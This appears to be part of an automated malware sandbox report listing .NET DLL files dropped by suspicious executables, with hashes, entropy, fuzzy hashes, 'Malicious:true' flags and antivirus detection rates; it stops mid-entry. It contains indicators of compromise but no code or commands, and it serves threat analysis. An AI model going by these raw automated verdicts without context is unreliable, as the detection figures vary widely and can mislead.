                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
